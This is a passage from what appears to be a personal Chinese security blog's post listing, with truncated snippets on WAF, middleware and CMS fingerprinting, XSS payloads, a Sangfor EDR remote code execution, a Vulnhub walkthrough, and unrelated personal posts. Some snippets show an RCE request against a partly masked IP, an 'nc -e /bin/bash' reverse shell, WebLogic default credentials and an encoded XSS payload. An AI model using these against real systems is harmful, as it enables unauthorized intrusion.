原创 我遇到的 各種WAF 指紋 安全狗 雲鎖 長亭 SafeLine 阿里雲WAF(猜測) 奇安信 不清楚的東西 D盾 山石網科 電信雲堤 中國電信安全防護

安全狗 雲鎖 長亭 SafeLine 阿里雲WAF(猜測) 奇安信 不清楚的東西 D盾 山石網科 電信雲堤 中國電信安全防護

原创 我遇到的 web中間件 指紋 weblogic springboot XAMPP JBoss IIS 待分類

weblogic 嘗試訪問https://xx.xx.xx/console/login/LoginForm.jsp 默認用戶weblogic 默認密碼weblogic 未授權上傳:/ws_utc/config.do,ws_utc/beg

原创 我遇到的 各種WAF 指紋 安全狗 雲鎖 長亭 SafeLine 阿里雲WAF(猜測) 奇安信 不清楚的東西 D盾 山石網科 電信雲堤

安全狗 雲鎖 長亭 SafeLine 阿里雲WAF(猜測) 奇安信 不清楚的東西 D盾 山石網科 電信雲堤

原创 我遇到的CMS 指紋 phpcms 致遠OA 泛微OA 8 wordpress 寶塔面板

phpcms 常見漏洞https://blog.csdn.net/qq_39101049/article/details/93735927 管理員登錄界面;/admin.php 致遠OA http://xhoa.xxxxx.com.

原创 我遇到的 web中間件 指紋 weblogic springboot XAMPP JBoss IIS

weblogic 嘗試訪問https://xx.xx.xx/console/login/LoginForm.jsp 默認用戶weblogic 默認密碼weblogic springboot 典型特徵就是小綠葉了 XAMPP phpm

原创 我的百度地圖足跡歷史

[圖片上傳中...(A6A6C41AE09B46D5A2745D2DE3584A5B.png-5bce7d-1601434675906-0)] 懷念一波好朋友們一起度過的歲月

原创 XSS payload 這個是AWVS掃描器的payload 這是我遇到的一個網站 其他一些奇怪的標籤

xss在線靶場 http://prompt.ml/0 https://xss-game.appspot.com/ 這個是AWVS掃描器的payload +e%27%22%28%29%26%25%3Cacx%3E%3CScRiPt+%3Eal

原创 深信服終端檢測響應平臺 遠程RCE漏洞,任意用戶登錄 遠程RCE 任意用戶登錄:

遠程RCE https://111.231.xx.xx/tool/log/c.php?strip_slashes=system&host=id 嘗試 彈個shell nc 10.20.3.129 4444 -e /bin/bash nc

原创 我的橘子

原创 XSS payload

xss在線靶場 http://prompt.ml/0 https://xss-game.appspot.com/ 這個是AWVS掃描器的payload +e%27%22%28%29%26%25%3Cacx%3E%3CScRiPt+%3Eal

原创 深信服終端檢測響應平臺 遠程RCE漏洞

https://111.231.xx.xx/tool/log/c.php?strip_slashes=system&host=id 嘗試 彈個shell nc 10.20.3.129 4444 -e /bin/bash nc嘗試反彈sh

原创 bilibili2019年報

http://t.cn/Aiszus9v

原创 我的網易雲2019聽歌年報

源鏈接:http://t.cn/AiFFKTSr

原创 vulnhub:DC-1 :drupal 7 (msf、配置文件位置、mysql、drupal數據庫加密方式、mysql-update數據、find -exec提權)

知道版本號 drupal 7 直接用msf payload一個一個嘗試可以獲得meterspreter shell flag1: 百度 drupal 配置文件的位置 ‘sites/default/files’; flag2: 這裏f

原创 我簡書2019總結

訪問鏈接:https://www.jianshu.com/k/story2019/380ac263177b 源鏈接:http://t.cn/AiFFaJcO 如果你是用電腦打開的,那麼按F12,刷新一下